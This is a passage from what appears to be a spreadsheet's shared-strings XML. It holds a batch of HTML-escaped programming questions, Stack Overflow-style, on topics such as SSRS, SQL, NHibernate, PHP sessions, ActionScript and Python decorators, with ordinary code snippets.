    <t xml:space="preserve">&lt;p&gt;So I've got various reports that consist of a DataSet rendered in a Tablix... pretty garden variety stuff. There is a property for the Tablix control named &lt;em&gt;RepeatColumnHeaders&lt;/em&gt;, which I have set to &lt;strong&gt;True&lt;/strong&gt; for each report in question. The explanation for this property states &amp;#8220;Indicates whether column headers are repeated on each page on which part of the data region appear.&amp;#8221; Sounds pretty straightforward, but on some reports it works and on others it does not. I can't seem to find what's different about the reports that might affect this. On one report where the headers do repeat, there is some fairly arcane grouping mojo, but in an example where it doesn't work the Tablix only has one level--no grouping. I would expect the multi-nested one to be the problem, not the flat one.&lt;/p&gt;
&lt;p&gt;Maybe it's a different problem altogether. I threw together a simple Tablix rendering &lt;strong&gt;SELECT * FROM Foo&lt;/strong&gt;, accepted all the default values, which results in RepeatColumnHeaders being set to &lt;strong&gt;False&lt;/strong&gt;, and lo and behold the column headers &lt;em&gt;do&lt;/em&gt; repeat for that report... Grrr.&lt;/p&gt;
&lt;p&gt;Any insights greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Java MVC frameworks integrate easily with StringTemplate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's hard to see how &lt;em&gt;StringTemplate&lt;/em&gt; integrates easily (or not) with &lt;em&gt;popular&lt;/em&gt; Java web MVC frameworks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Which Java MVC frameworks integrate easily with StringTemplate?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A good answer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;mentions &lt;strong&gt;one solution&lt;/strong&gt; to integrate with a framework,&lt;/li&gt;
&lt;li&gt;includes a &lt;strong&gt;link&lt;/strong&gt; to something useful and applicable, like:
&lt;ul&gt;
&lt;li&gt;a &lt;strong&gt;tutorial&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;or &lt;strong&gt;documentation&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;or a reference to &lt;strong&gt;source code&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;free&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;and &lt;strong&gt;open source&lt;/strong&gt; or &lt;strong&gt;public domain&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Readers/Voters&lt;/strong&gt;, please vote for a solution if you know it's true and great.&lt;/p&gt;
&lt;p&gt;In the scope of this question, I am &lt;em&gt;not interested in any other templating engine than StringTemplate&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Logical AND operator for bit fields</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 tables that have a many to many relationship; An Individual can belong to many Groups.  A Group can have many Individuals.  &lt;/p&gt;
&lt;p&gt;Individuals basically just have their Primary Key ID&lt;/p&gt;
&lt;p&gt;Groups have a Primary Key ID, IndividualID (same as the ID in the Individual Table), and a bit flag for if that group is the primary group for the individual&lt;/p&gt;
&lt;p&gt;In theory, all but one of the entries for any given individual in the group table should have that bit flag set to false, because every individual must have exactly 1 primary group.&lt;/p&gt;
&lt;p&gt;I know that for my current dataset, this assumption doesn't hold true, and I have some individuals that have the primary flag for ALL their groups set to false.&lt;/p&gt;
&lt;p&gt;I'm having trouble generating a query that will return those individuals to me.&lt;/p&gt;
&lt;p&gt;The closest I've gotten is:&lt;/p&gt;
&lt;p&gt;SELECT * FROM Individual i 
LEFT JOIN Group g ON g.IndividualID = i.ID
      WHERE g.IsPrimaryGroup = 0&lt;/p&gt;
&lt;p&gt;but going further than that with SUM or MAX doesn't work, because the field is a bit field, and not a numeric.  &lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Context agnostic JavaScript Testing Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a JavaScript Testing Framework that I can easily use in whatever context, be it browser, console, XUL, etc.&lt;/p&gt;
&lt;p&gt;Is there such a framework, or a way to easily retrofit an existing framework so its context agnostic?&lt;/p&gt;
&lt;p&gt;Edit: The testing framework should &lt;strong&gt;not&lt;/strong&gt; be tied to any other framework such as jQuery or Prototype.js and shouldn't depend on a DOM (or document object) being present. I'm looking for something to test &lt;strong&gt;pure JavaScript&lt;/strong&gt;. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Text Box vs Labels</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I  am developing a winForm App in C# and I have come across something that has always bothered me.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is it better practice to use a Label or a TextBox when displaying data to the user?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Things like Name, Phone #, etc.  My gut says to use a TextBox and just set it to read-only until the time comes that I need to allow editing from that particular spot.  Plan for the future, as it were.  &lt;/p&gt;
&lt;p&gt;As a young &lt;em&gt;Lone Wolf&lt;/em&gt; developer I would really appreciate any insight here.  Are there any pro's and con's to either?  Is there something else I am not thinking of?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS in sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to apply a CSS to a Sharepoint site (WSS3.0) based on the theme applied to a site.
The CSS would be saved at root site in 'Document Library'.
How do I apply the CSS programmatically on the page? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Caching and Session state management using Microsoft Velocity and Memcached</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was looking at Microsoft Velocity and memcached to find a solution for some session management issues -&lt;/p&gt;
&lt;p&gt;What is the difference between caching that is provided by Microsoft Velocity, memcached and session state management? I mean memcached and microsoft veolocity provide distributed caching capabilities... so using these to store session state would mean that session state would also be distributed .. Am i right in this assumption&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vertically align text next to an image?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why won't &lt;code&gt;vertical-align: middle&lt;/code&gt; work?  And yet, &lt;code&gt;vertical-align: top&lt;/code&gt; &lt;em&gt;does&lt;/em&gt; work.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div&amp;gt;
   &amp;lt;img style="width:30px;height:30px"&amp;gt;
   &amp;lt;span style="vertical-align:middle"&amp;gt;Doesn't work.&amp;lt;/span&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>HQL - row identifier for pagination</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if HQL has a keyword to identify rows such as ROWID or ROWNUM?&lt;/p&gt;
&lt;p&gt;I would like to implement pagination with HQL but I am not able to use .setMaxResult() or .setFirstResult() because I don't work with the session object directly and therefore don't use the Query object but simply create my query as a string and use the .find() method. &lt;/p&gt;
&lt;p&gt;I tried using LIMIT and OFFSET in my query, but HQL seems to be ignoring these keywords and is returning the whole result to me no matter what.&lt;/p&gt;
&lt;p&gt;I'm also not able to use Hibernate criteria because it does not have support for the "HAVING" clause that appears in my query.&lt;/p&gt;
&lt;p&gt;My last resort is to restrict the result set using the ROWNUM/ROWID keyword. Does anyone else have any other suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you write this query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to refactor the below query to something more readable and modifiable.  The first half is identical to the second, with the exception of the database queried from (table names are the same though.)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  SELECT
    Column 1 AS c1,
    ...
    Column N AS cN
  FROM
    database1.dbo.Table1
UNION
  SELECT
    'Some String' as c1,
    ...
    NULL as cN
  FROM
    database1.dbo.Table2
UNION
  SELECT
    Column 1 AS c1,
    ...
    Column N AS cN
  FROM
    database2.dbo.Table1
UNION
  SELECT
    'Some String' as c1,
    ...
    NULL as cN
  FROM
    database2.dbo.Table2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This query is the definition of DRY and is calling to me to be re-written, but I have no idea how!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: We can't use linq and we desire distinct results; I'm looking to make the query smaller in physical file size, not in results returned.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: The database I'm querying off is a proprietary ERP database.  Restructuring it is not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does ActionScript 3 require an error event handler for XML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a Flash game I am developing, there are some settings that are set by an external XML file.  When I run the SWF file through the Flash IDE, it loads fine.  If I run the same file as a projector (.exe) or the independent SWF file, it does not load the XML file.&lt;/p&gt;
&lt;p&gt;My (unexpected) fix was to assign an &lt;em&gt;error&lt;/em&gt; event listener to the loader object.  When I published the file again, the XML loaded properly in the projector and standalone SWF files.  (I have since verified that commenting out the error event handler restores the bug).&lt;/p&gt;
&lt;p&gt;Here's the block of code involved (&lt;del&gt;with extraneous code and function calls removed&lt;/del&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function getSettings():void {
outputBox = getChildByName("output_box") as TextField;
var xmlLoader:URLLoader = new URLLoader();
var xmlData:XML = new XML();				
xmlLoader.addEventListener(Event.COMPLETE, loadXML, false, 0, true); 
xmlLoader.addEventListener(ErrorEvent.ERROR, function (e:Error) 
	{ outputBox.appendText(e.message) });
try {				
	xmlLoader.load(xmlPath);
} 
catch(err:Error) {
	trace(err.message);
	outputBox.appendText(err.message);
	checkChances("0");
}
function loadXML(e:Event):void {
	try {
		xmlData = new XML(e.target.data);
		var chances:String = xmlData.chances.text();
		var dbURL:String = xmlData.database.text();
		trace("Chances are set to: " + chances);					
		trace("Database URL is set to: " + dbURL);
		outputBox.appendText("Chances are set to: " + chances);
	}
	catch(err:Error) {				
		outputBox.appendText(err.message);
	}
		checkChances(chances);
		dbPath = new URLRequest(dbURL);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;Let me know if you have run into this, or if you can shed some light on what may be happening.  Thanks!&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Here is the code which does &lt;em&gt;not&lt;/em&gt; work. (I also edited the code that does work to show all the other bits that I took out, just in case they might be effecting it):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function getSettings():void {
outputBox = getChildByName("output_box") as TextField;
var xmlLoader:URLLoader = new URLLoader();
var xmlData:XML = new XML();				
xmlLoader.addEventListener(Event.COMPLETE, loadXML, false, 0, true); 
/*xmlLoader.addEventListener(ErrorEvent.ERROR, function (e:Error) 
	{ outputBox.appendText(e.message) });*/
try {				
	xmlLoader.load(xmlPath);
} 
catch(err:Error) {
	trace(err.message);
	outputBox.appendText(err.message);
	checkChances("0");
}
function loadXML(e:Event):void {
	try {
		xmlData = new XML(e.target.data);
		var chances:String = xmlData.chances.text();
		var dbURL:String = xmlData.database.text();
		trace("Chances are set to: " + chances);					
		trace("Database URL is set to: " + dbURL);
		outputBox.appendText("Chances are set to: " + chances);
	}
	catch(err:Error) {				
		outputBox.appendText(err.message);
	}
		checkChances(chances);
		dbPath = new URLRequest(dbURL);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>import csv file/excel into sql database asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am starting a project with asp.net visual studio 2008 / SQL 2000 (2005 in future) using c#.&lt;/p&gt;
&lt;p&gt;The tricky part for me is that the existing DB schema changes often and the import files columns will all have to be matched up with the existing db schema since they may not be one to one match on column names. (There is a lookup table that provides the tables schema with column names I will use)&lt;/p&gt;
&lt;p&gt;I am exploring different ways to approach this, and need some expert advice.  Is there any existing controls or frameworks that I can leverage to do any of this?&lt;/p&gt;
&lt;p&gt;So far I explored FileUpload .NET control, as well as some 3rd party upload controls to accomplish the upload such as &lt;a href="http://krystalware.com/Products/SlickUpload/" rel="nofollow"&gt;SlickUpload&lt;/a&gt; but the files uploaded should be &amp;lt; 500mb&lt;/p&gt;
&lt;p&gt;Next part is reading of my csv /excel and parsing it for display to the user so they can match it with our db schema.  I saw &lt;a href="http://www.codeproject.com/KB/database/CsvReader.aspx" rel="nofollow"&gt;CSVReader&lt;/a&gt; and others but for excel its more difficult since I will need to support different versions.&lt;/p&gt;
&lt;p&gt;Essentially The user performing this import will insert and/or update several tables from this import file.  There are other more advance requirements like record matching but and preview of the import records, but I wish to get through understanding how to do this first.&lt;/p&gt;
&lt;p&gt;Update: I ended up using csvReader with LumenWorks.Framework for uploading the csv files. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do Real Values sort different than floats in SQL Server queries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone think of a reason to do this:&lt;/p&gt;
&lt;p&gt;SELECT * FROM TableA
ORDER BY cast(cast(RealColumnA as nvarchar(50))as float)
--where RealColumnA is defined as real in the table&lt;/p&gt;
&lt;p&gt;A former developer of mine insisted this was necessary to get reals to sort correctly.  Can anyone think of a reason that may be true?&lt;/p&gt;
&lt;p&gt;The cast in the orderby clause is a big performance killer.  But I need to be sure it is not necessary before I remove it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some common uses for Python decorators?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While I like to think of myself as a reasonably competent Python coder, one aspect of the language I've never been able to grok is decorators.&lt;/p&gt;
&lt;p&gt;I know what they are (superficially), I've read tutorials, examples, questions on Stack Overflow, and I understand the syntax, can write my own, occasionally use @classmethod and @staticmethod, but it never occurs to me to use a decorator to solve a problem in my own Python code.  I never encounter a problem where I think, "Hmm...this looks like a job for a decorator!"&lt;/p&gt;
&lt;p&gt;So, I'm wondering if you guys might offer some examples of where you've used decorators in your own programs, and hopefully I'll have an "A-ha!" moment and &lt;em&gt;get&lt;/em&gt; them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code Dependency documentation software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a tool to document legacy source code for an embedded C project I work with.  I had it in my mind that there was a tool that would create charts of the various C and .h files, but I can't recall what it is called.  Does anyone know of such a tool?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I indicate to clients that SPNEGO is supported but NTLM is not for HTTP requests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The two WWW-Authenticate additions Microsoft makes use of that I am currently aware of are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NTLM&lt;/li&gt;
&lt;li&gt;Negotiate&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If Negotiate is sent down from the server, based on a set of conditions Kerberos will be used&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Intranet Zone&lt;/li&gt;
&lt;li&gt;Accessing the server using a Hostname rather then IP&lt;/li&gt;
&lt;li&gt;Integrated Windows Authentication in IE is enabled, the host is trusted in Firefox&lt;/li&gt;
&lt;li&gt;The Server is not local to the browser&lt;/li&gt;
&lt;li&gt;The client's Kerberos system is authenticated to a domain controller&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Then Kerberos will be attempted between the server and the client, if something above is not met, then NTLM will be attempted.&lt;/p&gt;
&lt;p&gt;My question is, is there some way for the server to indicate that NTLM should not be sent?  I currently handle this by keeping track of the request in the session, and if a NTLM message is received, it disables Kerberos and WWW-Authenticate for the rest of that sessions life.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate not evicting objects from a session</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm mapping a ProductCategory tree using Fluent NHibernate and everything was going fine until I tried to walk the tree that is returned from the database to ensure it's saving and retreiving appropriately.&lt;/p&gt;
&lt;p&gt;Here's how I'm testing:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Instantiate 4 categories: Beverages, Beer, Light Beer, and Dark Beer&lt;/li&gt;
&lt;li&gt;Add Beer to Beverages, then Light Beer and Dark Beer to Beer.&lt;/li&gt;
&lt;li&gt;Save Beverages (cascade is set to AllDeleteOrphan)&lt;/li&gt;
&lt;li&gt;Flush the session, which persists the entire tree&lt;/li&gt;
&lt;li&gt;Evict each of the ProductCategories from the session&lt;/li&gt;
&lt;li&gt;Load Beverages from the database&lt;/li&gt;
&lt;li&gt;Check that the loaded object (fromDB) is EqualTo but not SameAs Beverages.&lt;/li&gt;
&lt;li&gt;Check that fromDB has only one child ProductCategory&lt;/li&gt;
&lt;li&gt;Check that the only child in fromDB is EqualTo but not SameAs Beer&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The test fails because the child is the SameAs Beer.  Which means that it's not actually loading the object from the database, because it's still in the NHibernate session somewhere.&lt;/p&gt;
&lt;p&gt;Any insight will be much appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; In response to Sean's comments below.  I am using an in memory SQLite database, so as soon as the session/connections are closed the database is blown away.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QScintilla scrollbar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I add a QsciScintilla object to my main window the horizontal scrollbar is active and super wide (tons of apparent white space). Easy fix?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to validate URL parameters in Spring MVC website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Spring MVC to build my web application, and I have a question about validating parameters I receive in the URL. &lt;strong&gt;What is the best way to detect invalid parameters and display errors to the user?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Suppose I have a "View User Profile" page. The profile that is displayed is based on a user ID parameter specified in the URL. I might go to the following address to view the profile of the user with ID 92:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://www.somedomain.com/profile.html?id=92" rel="nofollow"&gt;http://www.somedomain.com/profile.html?id=92&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have created a &lt;code&gt;ProfileControlller&lt;/code&gt; object which will do the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Get the &lt;code&gt;id&lt;/code&gt; parameter from the &lt;code&gt;request&lt;/code&gt; object&lt;/li&gt;
&lt;li&gt;Load a &lt;code&gt;UserProfile&lt;/code&gt; object from my database&lt;/li&gt;
&lt;li&gt;Add the &lt;code&gt;UserProfile&lt;/code&gt; object to the model&lt;/li&gt;
&lt;li&gt;Construct a &lt;code&gt;ModelAndView&lt;/code&gt; with my model and the "View User Profile" JSP&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That works fine if the user enters a valid ID number. My &lt;code&gt;UserProfile&lt;/code&gt; object is loaded and displayed perfectly using JSP. But what if someone passes user ID &lt;code&gt;-30294&lt;/code&gt; to my page? My data access layer will simply return a &lt;code&gt;null&lt;/code&gt; object if the ID is invalid, but I would like to show a friendly error message to the user. Is checking for a &lt;code&gt;null&lt;/code&gt; &lt;code&gt;UserProfile&lt;/code&gt; object in the JSP code really the best solution here?&lt;/p&gt;
&lt;p&gt;Since I am new to Spring, I'm not sure. I like the way &lt;code&gt;Validator&lt;/code&gt; classes can be used with &lt;code&gt;FormController&lt;/code&gt; objects, if that is any help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSP template inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Coming from a background in Django, I often use "template inheritance", where multiple templates inherit from a common base. Is there an easy way to do this in JSP? If not, is there an alternative to JSP that does this (besides Django on Jython that is :)&lt;/p&gt;
&lt;h2&gt;base template&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
  &amp;lt;body&amp;gt;
    {% block content %}
    {% endblock %}
  &amp;lt;/body&amp;gt;
&amp;lt;html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;basic content&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;{% extends "base template" %}
{% block content %}
&amp;lt;h1&amp;gt;{{ content.title }} &amp;lt;-- Fills in a variable&amp;lt;/h1&amp;gt;
{{ content.body }} &amp;lt;-- Fills in another variable
{% endblock %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Will render as follows (assuming that conten.title is "Insert Title Here", and content.body is "Insert Body Here")&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
  &amp;lt;body&amp;gt;
    &amp;lt;h1&amp;gt;Insert title Here &amp;lt;-- Fills in a variable&amp;lt;/h1&amp;gt;
    Insert Body Here &amp;lt;-- Fills in another variable
  &amp;lt;/body&amp;gt;
&amp;lt;html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Favorite (Clever) Defensive Programming Best Practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you had to choose your &lt;strong&gt;Favorite&lt;/strong&gt; (clever) techniques for defensive coding, what would they be?  Although my current languages are Java and Objective-C (with a background in C++), feel free to answer in any language.  Emphasis here would be on &lt;em&gt;clever&lt;/em&gt; defensive techniques other than those that 70%+ of us here already know about.  So now it is time to dig deep into your bag of tricks.&lt;/p&gt;
&lt;p&gt;In other words try to think of other than this &lt;strong&gt;uninteresting&lt;/strong&gt; example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;if(5 == x)&lt;/code&gt; &lt;strong&gt;instead of&lt;/strong&gt; &lt;code&gt;if(x == 5)&lt;/code&gt;:  to avoid unintended assignment&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here are some examples of some &lt;strong&gt;intriguing&lt;/strong&gt; best defensive programming practices (language-specific examples are in Java):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;- Lock down your variables until you know that you need to change them&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;That is, you can declare &lt;em&gt;all&lt;/em&gt; variables &lt;code&gt;final&lt;/code&gt; until you know that you will need to change it, at which point you can remove the &lt;code&gt;final&lt;/code&gt;. One commonly unknown fact is that this is also valid for method params:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void foo(final int arg) { /* Stuff Here */ }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;- When something bad happens, leave a trail of evidence behind&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;There are a number of things you can do when you have an exception: obviously logging it and performing some cleanup would be a few.  But you can also leave a trail of evidence (e.g. setting variables to sentinel values like "UNABLE TO LOAD FILE" or 99999 would be useful in the debugger, in case you happen to blow past an exception &lt;code&gt;catch&lt;/code&gt;-block).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;- When it comes to consistency: the devil is in the details&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Be as consistent with the other libraries that you are using.  For example, in Java, if you are creating a method that extracts a range of values make the lower bound &lt;em&gt;inclusive&lt;/em&gt; and the upper bound &lt;em&gt;exclusive&lt;/em&gt;.  This will make it consistent with methods like &lt;code&gt;String.substring(start, end)&lt;/code&gt; which operates in the same way.  You'll find all of these type of methods in the Sun JDK to behave this way as it makes various operations including iteration of elements consistent with arrays, where the indices are from Zero (&lt;em&gt;inclusive&lt;/em&gt;) to the length of the array (&lt;em&gt;exclusive&lt;/em&gt;). &lt;/p&gt;
&lt;p&gt;So what are some favorite defensive practices of yours?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update: If you haven't already, feel free to chime in.  I am giving a chance for more responses to come in before I choose the &lt;em&gt;official&lt;/em&gt; answer.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LoaderLock error on program termination</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have recently integrated the .NET NLog logging component into one of our applications which developed purely in unmanaged code (C++ and VB6 components compiled in Visual Studio 6). We have a bunch of C++ application talking to NLog via a COM interface.&lt;/p&gt;
&lt;p&gt;Everything is working fine at the moment but I do notice that the following message pops up (in the output window if debugging the C++ component in VS6; as a prompt in the IDE if debugging NLog via VS 2005) during program termination:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;LoaderLock was detected Message:
  Attempting managed execution inside OS
  Loader lock. Do not attempt to run
  managed code inside a DllMain or image
  initialization function since doing so
  can cause the application to hang.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The DllMain is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extern "C"
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID /*lpReserved*/)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
    	_Module.Init(ObjectMap, hInstance);
    	DisableThreadLibraryCalls(hInstance);
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    	_Module.Term();
    return TRUE;    // ok
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My guess is that &lt;code&gt;_Module.Term();&lt;/code&gt; now includes the releasing of some .NET references (I am keeping a reference to a NLog object in one of my C++ classes to avoid having to instantiate and release each time) which is causing this warning to pop up.&lt;/p&gt;
&lt;p&gt;My question: is this safe to ignore? If it isn't, what is a good workaround? (the best I can think of is to instantiate a reference to that NLog object and release it every time I want to write to the log file...not the most elegant of solutions)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP session seemingly not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Session variables are apparently not working for me. I don't know what I'm doing wrong. This is the code that I'm using to check for a valid password:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ($input_password_hash == $password_hash)
 {
  session_start();
  $_SESSION['is_user'] = 1;
  header("Location: ../new_look"); //or Location: index.php
 }
else echo "Wrong password.";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in the index.php file (where it redirects to), I have this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ($_SESSION['is_user'] == 1)
{
  //show index page with navigation bar for registered user
}
else
{
 //do something else
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it's not working at all.&lt;/p&gt;
&lt;p&gt;The session does apparently start and that can be verified by checking the cookie.&lt;/p&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP array problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sending some data over AJAX to a PHP file. It's about filter options. Anyway, I am sending it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filter[0][data][type]   string
filter[0][data][value] automobiles
filter[0][field] product
filter[1][data][type] numeric
filter[1][data][value] 6000
filter[1][field] price
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This above is taken from FireBug console. Then, in PHP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$filter = $_POST['filter'.$i];
if (is_array($filter)) {
    for ($i=0;$i&amp;lt;count($filter);$i++){
    	switch($filter[$i]['data']['type']){
    		case 'string' : 
                        // I'm doing my select from database based on that and so on
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, the translation of this would be: 
"Get me all the records from database that are: &lt;em&gt;hmm, let's check the filters&lt;/em&gt;... I'm getting the first filter type witch is "string" witch needs to be applied to the mysql column named "product"...So I'm searching for the value of "automobiles" there...But I'm not finished yet, the second filter refers to a  numeric filter for the column "price" from database. so I'm taking its value and add it to the query. So I'll end up selecting all the automobiles that have a price greater than 6000.&lt;/p&gt;
&lt;p&gt;So far so good. The problem is that my way of getting data have changed and I can't send my data in this format no more. The new format is an URL witch looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filter[0][field]=prodct&amp;amp;filter[0][data][type]=string&amp;amp;filter[0][data][value]=automobiles&amp;amp;filter[1][field]=price&amp;amp;filter[1][data][type]=numeric&amp;amp;filter[1][data][value]=6000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can do an explode on this one by the "&amp;amp;" and end up with an array...I can do a lot... The problem is that I don't know how to adjust my query building script to work with that kind of received data..So that I can do a "switch($filter[$i]['data']['type']){" again...&lt;/p&gt;
&lt;p&gt;Any ideas for modifying the code ?&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add NHibernate configuration file to use NHibernate.Search?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I try to use NHibernate.Search that I built from trunk and use with NHibernate 2.0.1. When I add some NHibernate.Search properties config into configuaration file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;property name="hibernate.search.default.directory_provider"&amp;gt;NHibernate.Search.Storage.RAMDirectoryProvider, NHibernate.Search&amp;lt;/property&amp;gt;
&amp;lt;property name="hibernate.search.default.indexBase"&amp;gt;~\index\&amp;lt;/property&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get an invalid System.Xml.Schema.XmlSchemaException: The Enumeration constraint failed. When I use :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var configuration = new Configuration().Configure();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So how can I solve this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Virtual address space in 64 bit systems running in compatibility mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I saw that on a 64 bit windows OS the user virtual address space available is 8 terra bytes. But if the program we are executing on this is running in 32 bit compatibility mode is this much of user space still available ? or does it behave like a normal 32 bit OS and gives only 2GB user address space?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add Colors in Combo box in .NET Windows application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to add 'Colors' (not color name, color itself ) as an item in combo box in C#?&lt;/p&gt;
</t>
  </si>
